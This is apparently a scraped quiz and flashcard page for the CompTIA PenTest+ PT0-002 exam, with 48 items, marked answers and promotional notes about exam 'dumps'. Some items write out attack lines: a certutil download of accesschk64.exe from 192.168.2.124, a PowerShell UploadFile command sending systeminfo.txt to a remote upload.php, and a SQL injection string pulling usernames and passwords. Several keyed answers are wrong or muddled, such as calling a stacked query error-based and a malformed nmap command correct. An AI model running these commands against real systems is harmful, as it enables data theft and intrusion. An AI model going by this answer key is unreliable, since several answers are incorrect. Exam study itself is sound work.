CompTIA PenTest+ PT0-002 Exam Preparation
48 Questions
3 Views

Choose a study mode

Play Quiz
Study Flashcards
Spaced Repetition
Chat to Lesson

Podcast

Play an AI-generated podcast conversation about this lesson

Questions and Answers

Which vulnerability allows a tester to obtain credentials by querying a cloud provider's metadata?

  • Server-side request forgery (correct)
  • Local file inclusion
  • Remote file inclusion
  • Cross-site request forgery

What command can a penetration tester use to download a file from a remote server to assist in exploring service permissions?

  • wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe
  • schtasks /query /fo LIST /v | find /I “Next Run Time:”
  • powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)
  • certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe (correct)

Which command would a penetration tester use to perform a ping scan on a subnet?

  • nmap -sn 10.12.1.0/24 (correct)
  • nmap -sV -A 10.12.1.0/24
  • nmap -Pn 10.12.1.0/24
  • nmap -sT -p- 10.12.1.0/24

What is the most effective recommendation to secure a wireless network after an unauthorized access event using Aircrack-ng?

<p>Changing to Wi-Fi equipment that supports strong encryption (A)</p> Signup and view all the answers

Which benefit does the command 'schtasks /query /fo LIST /v | find /I “Next Run Time:”' provide when exploring service permissions?

<p>Lists all scheduled tasks and their next run times (C)</p> Signup and view all the answers

What aspect of testing does server-side request forgery highlight when accessing cloud provider metadata?

<p>Obtaining sensitive environment data (D)</p> Signup and view all the answers

What is the best method for a penetration tester to pivot and gain additional access to a network when faced with restrictive ACLs on a wireless subnet?

<p>Span deauthentication packets to the wireless clients. (D)</p> Signup and view all the answers

Which approach is NOT recommended to enhance wireless security?

<p>Using WEP encryption (D)</p> Signup and view all the answers

What likely caused all 65,535 ports to be reported as filtered during a second Nmap scan?

<p>A firewall or IPS blocked the scan. (A)</p> Signup and view all the answers

Which tool provides an exploitation suite with payload modules covering the broadest range of target system types?

<p>Metasploit (A)</p> Signup and view all the answers

What impact does using 'nmap -sV -A 10.12.1.0/24' have when assessing a network?

<p>It provides versioning and OS detection for services running on hosts (B)</p> Signup and view all the answers

Which tool combination would be most effective for preparing an attack after discovering a PHP script in a vulnerable state?

<p>Burp Suite and DIRB (A)</p> Signup and view all the answers

What does the -F option in an Nmap scan refer to?

<p>Fast scan that checks only common ports. (B)</p> Signup and view all the answers

If a penetration tester finds a PHP script in an unprotected internal repository, what should be the primary concern?

<p>The script may contain security vulnerabilities. (A)</p> Signup and view all the answers

Which of the following responses is NOT a potential countermeasure a firewall might perform during a network scan?

<p>Automatically updating signature definitions. (B)</p> Signup and view all the answers

In the context of penetration testing, what is an 'evil twin' attack?

<p>A technique of impersonating a legitimate access point. (C)</p> Signup and view all the answers

After discovering a vulnerability and failing to report it, what is the appropriate next step for the company?

<p>Investigate the penetration tester (D)</p> Signup and view all the answers

What should a company verify first when it wants to test the security of its hosted data after obtaining permission from a cloud service provider?

<p>Whether sensitive client data is publicly accessible (A)</p> Signup and view all the answers

What is an example of a Bluesnarfing attack that a penetration tester could perform?

<p>Dump the user address book on the device (D)</p> Signup and view all the answers

Why is it critical for companies to thoroughly investigate after a breach has occurred?

<p>To determine the cause and prevent future incidents (D)</p> Signup and view all the answers

Which of the following is NOT a recommended action after notifying a client about a data breach?

<p>Increase marketing efforts to regain client trust (A)</p> Signup and view all the answers

What outcomes can a poorly executed penetration test lead to?

<p>Unauthorized access to sensitive data (A)</p> Signup and view all the answers

What action should be prioritized to ensure client data is protected in a cloud environment?

<p>Strict access controls (C)</p> Signup and view all the answers

What is the primary goal of conducting a vulnerability scan?

<p>To identify potential security weaknesses (C)</p> Signup and view all the answers

Which of the following actions would be considered unethical according to the SOW? (Select two)

<p>Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team (B), Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address (C)</p> Signup and view all the answers

What is the most likely reason for receiving TCP resets during the assessment of web servers?

<p>The web server is using a Web Application Firewall (WAF) (B)</p> Signup and view all the answers

What should a penetration tester do with client findings after an engagement according to the SOW?

<p>Dispose of findings by erasing them in a secure manner (A)</p> Signup and view all the answers

Which behavior aligns with ethical standards when working with a client’s confidential information?

<p>Encrypting findings before delivering them to the client (A)</p> Signup and view all the answers

In the context of the SOW, which of the following actions could be potentially harmful to the client's security?

<p>Disregarding security protocols of the engagement (B)</p> Signup and view all the answers

When a WAF resets a TCP connection, what is it likely responding to?

<p>Malformed packets or suspected attacks (C)</p> Signup and view all the answers

What is a primary responsibility of a penetration tester concerning client confidentiality?

<p>Maintaining confidentiality of sensitive information regarding the client (B)</p> Signup and view all the answers

Which practice could lead to ethical violations in penetration testing?

<p>Failing to report critical vulnerabilities to the client (D)</p> Signup and view all the answers

Which tool is the penetration tester MOST likely to use for performing a vulnerability scan against a web server?

<p>Nikto (A)</p> Signup and view all the answers

What type of SQL injection attack is indicated by the input '1;SELECT Username, Password FROM Users;'?

<p>Error-based (C)</p> Signup and view all the answers

Based on Nmap scan results, which operating system is the target MOST likely running if the scan points to Windows features?

<p>Windows Server (C)</p> Signup and view all the answers

Which Nmap command correctly scans for UDP services SNMP, NetBIOS, and DNS?

<p>nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan (C)</p> Signup and view all the answers

What should a company do NEXT if security alarms are triggered during a penetration test?

<p>Contact law enforcement. (D)</p> Signup and view all the answers

Which scenario BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

<p>The IP address is on the blocklist. (A)</p> Signup and view all the answers

In which scenario would a penetration tester most likely use Nmap?

<p>To perform a network discovery. (A)</p> Signup and view all the answers

Which of the following correctly represents a limitation of penetration testing?

<p>It can only evaluate known vulnerabilities. (C)</p> Signup and view all the answers

What is the primary reason for TCP resets from a web server when a WAF is present?

<p>The WAF is blocking legitimate traffic. (B)</p> Signup and view all the answers

Which recommendation should a penetration tester make to address the use of vulnerable third-party modules in products?

<p>Add a dependency checker into the tool chain. (B)</p> Signup and view all the answers

What change is necessary for fixing the Perl script used to identify vulnerabilities in network switches?

<p>Remove unnecessary variables and streamline the code. (B)</p> Signup and view all the answers

Which tool should be used to pass the hash once password hashes are extracted from lsass.exe?

<p>Mimikatz (D)</p> Signup and view all the answers

What is the most effective way to ensure the security of API settings before a deployment?

<p>Implement strict validation protocols. (B)</p> Signup and view all the answers

What tool is recommended for achieving persistence after passing the hash?

<p>WMI (A)</p> Signup and view all the answers

Which option describes a common outcome when a penetration tester uses a dependency checker during the software development process?

<p>Detecting and addressing known vulnerabilities in libraries. (B)</p> Signup and view all the answers

What is a critical step to ensure the Perl script runs properly?

<p>Modifying specific lines to correct initialization. (A)</p> Signup and view all the answers

Flashcards

Pivot Attack Method (Wireless Subnet)

Gaining access to a network by exploiting a vulnerability to move from a compromised system (e.g. a laptop) to a wider network

Nmap Scan Flags (filtered ports)

Nmap flags used in a scan that indicates all ports are filtered by a firewall or Intrusion Prevention System (IPS).

Comprehensive Exploitation Suite

A software tool that is designed to enable complete penetration testing.

Web Application Vulnerability (PHP)

Vulnerability found in a PHP web application script that could be exploited in an unprotected source repository.

Signup and view all the flashcards

Penetration Testing Toolset (PHP)

Tools that assist in preparing for attacks on web application vulnerabilities caused by PHP code.

Signup and view all the flashcards

Port Scanning (Nmap -F)

Fast scan using Nmap, checks a small number of common ports to quickly assess if a service responds.

Signup and view all the flashcards

Evil Twin Attacks

Creating a fake wireless access point that mimics a legitimate one and lures users into connecting to it.

Signup and view all the flashcards

De-authentication

A wireless attack that forces the disconnection of a wireless client

Signup and view all the flashcards

Server-Side Request Forgery (SSRF)

An attack where an attacker tricks a server into making requests to other servers on the network.

Signup and view all the flashcards

Exploiting Instance Credentials (metadata)

Gaining access to cloud server credentials by querying cloud provider metadata.

Signup and view all the flashcards

Low-Privilege Shell

A type of shell account with limited access on a system.

Signup and view all the flashcards

Misconfigured Service Permissions

Vulnerability where a service has more permissions than it should, a security misconfiguration.

Signup and view all the flashcards

Ping Scan

A network scan technique that uses ICMP echo requests to discover live hosts on a network.

Signup and view all the flashcards

Wireless Network Remediation

Actions to secure a wireless network, typically addressing weak encryption.

Signup and view all the flashcards

Impersonating IT Help Desk

Using deception to gain access to sensitive information or control.

Signup and view all the flashcards

Strong Encryption (Wi-Fi)

Using robust encryption protocols (like WPA2/3) to secure wireless transmissions.

Signup and view all the flashcards

Penetration Tester's Responsibility

A penetration tester is responsible for identifying and reporting vulnerabilities in a system. Failing to report a vulnerability and leaving it unfixed is unethical and potentially harmful.

Signup and view all the flashcards

Vulnerability Scan Permission

Before scanning a system, verify that permission has been obtained from the appropriate parties, especially the cloud service provider.

Signup and view all the flashcards

Initial Risk Assessment Focus

First, evaluate if sensitive data is publicly accessible in a hosted environment to assess a critical risk that affects data confidentiality.

Signup and view all the flashcards

Bluesnarfing Attack

Bluesnarfing is an attack method where a penetration tester can gain unauthorized access to the information stored on a Bluetooth-enabled mobile device. This allows them to access personal information.

Signup and view all the flashcards

Unauthorized Access

Gaining access to a system, network, or data without official permission.

Signup and view all the flashcards

Data Confidentiality

Protecting sensitive data from unauthorized access or disclosure

Signup and view all the flashcards

Penetration Test Follow-Up

After a penetration test, the appropriate action is to investigate who is potentially accountable for a vulnerability and its associated issues.

Signup and view all the flashcards

Secure SDLC

Secure Software Development Lifecycle (SDLC) is a process to design, develop, and deploy applications following security standards in phases.

Signup and view all the flashcards

Unethical Penetration Tester Behavior

Actions that violate professional ethics, potentially harming the client or compromising security.

Signup and view all the flashcards

Proprietary Penetration Testing Tools

Tools not publicly available or accessible to the client for review.

Signup and view all the flashcards

Hiding Critical Vulnerabilities

Failure to report critical security flaws in a client's system to please senior management, potentially jeopardizing the system's security.

Signup and view all the flashcards

Using Underground Forums

Seeking assistance from hacker forums for engagements, potentially exposing client information.

Signup and view all the flashcards

TCP Resets During Assessment

Web server disconnecting connections abruptly during a penetration test, often caused by a Web Application Firewall (WAF).

Signup and view all the flashcards

Web Application Firewall (WAF)

A security system designed to protect web applications from attacks by filtering traffic.

Signup and view all the flashcards

Client Confidential Information

Data like network diagrams, asset inventory, and employee names that are confidential.

Signup and view all the flashcards

Secure Disposal of Findings

Properly erasing or deleting findings after the penetration testing engagement using secure methods.

Signup and view all the flashcards

Nikto

A web server vulnerability scanner used by penetration testers to identify potential security weaknesses.

Signup and view all the flashcards

Error-Based SQL Injection

A type of SQL injection attack where the attacker injects malicious SQL code and observes the server's error messages to gain information about the database structure.

Signup and view all the flashcards

Nmap Scan for UDP Services

Using Nmap to scan specific UDP ports for running services like SNMP, NetBIOS, and DNS.

Signup and view all the flashcards

Penetration Test Deconfliction

The process of coordinating with the organization being tested to ensure the test doesn't cause unwanted disruptions or security alerts.

Signup and view all the flashcards

Blocked IP Address

An IP address that is prevented from accessing a network or server due to security rules or blacklisting.

Signup and view all the flashcards

WAF and TCP Resets

A Web Application Firewall (WAF) may cause TCP reset packets to be sent back to a penetration tester during scanning. This happens because the WAF is actively blocking or filtering malicious requests.

Signup and view all the flashcards

Dependency Checker

A tool that analyzes software code to identify and report on the use of vulnerable third-party libraries or modules. This helps developers avoid security issues by ensuring that their code uses safe and up-to-date components.

Signup and view all the flashcards

Vulnerable Third-Party Modules

Software components created by other companies and used within a larger application. If these modules have known weaknesses (vulnerabilities), they can expose the entire application to security risks.

Signup and view all the flashcards

Mimikatz

A tool often used by penetration testers to extract logon passwords from the memory of a target system. It can retrieve credentials stored in the LSASS (Local Security Authority Subsystem Service) process.

Signup and view all the flashcards

Pass the Hash

A technique used to gain unauthorized access to a system by leveraging stolen password hashes. Instead of cracking the hash and getting the actual password, the attacker directly uses the hash to authenticate.

Signup and view all the flashcards

Persistence (Penetration Testing)

The ability of an attacker to maintain access and control over a compromised system even after a reboot or system changes. It involves establishing a backdoor or setting up mechanisms for re-gaining access.

Signup and view all the flashcards

PsExec

A tool often used in combination with Mimikatz to execute commands or programs on remote systems using stolen credentials. It allows attackers to maintain persistence and control.

Signup and view all the flashcards

Empire

A post-exploitation framework used by penetration testers to establish and maintain persistence on a compromised system. It provides a variety of tools and techniques for monitoring and controlling the target.

Signup and view all the flashcards

Study Notes

CompTIA PenTest+ PT0-002 Dumps

  • CertLeader provides 100% valid and up-to-date practice questions and answers for the CompTIA PenTest+ certification exam (PT0-002).
  • The dumps contain 253 questions and answers.
  • The website provides links to access the practice materials.
  • The dumps cover the CompTIA PenTest+ certification exam.

Studying That Suits You

Use AI to generate personalized quizzes and flashcards to suit your learning preferences.

Quiz Team

Related Documents

PT0-002 Practice Questions PDF

Description

Get ready for your CompTIA PenTest+ PT0-002 exam with our comprehensive practice questions and answers. This quiz includes 253 valid and up-to-date questions, designed to help you succeed in your certification goals. Access the best preparatory materials to boost your confidence and performance on exam day.

More Like This

TestOut CompTIA A+ Flashcards
95 questions
CompTIA A+ Certification Flashcards
26 questions
CompTIA PenTest+ Exam Overview
9 questions
CompTIA Pentest 3.1 Interview Insights
39 questions
Use Quizgecko on...
Browser
Browser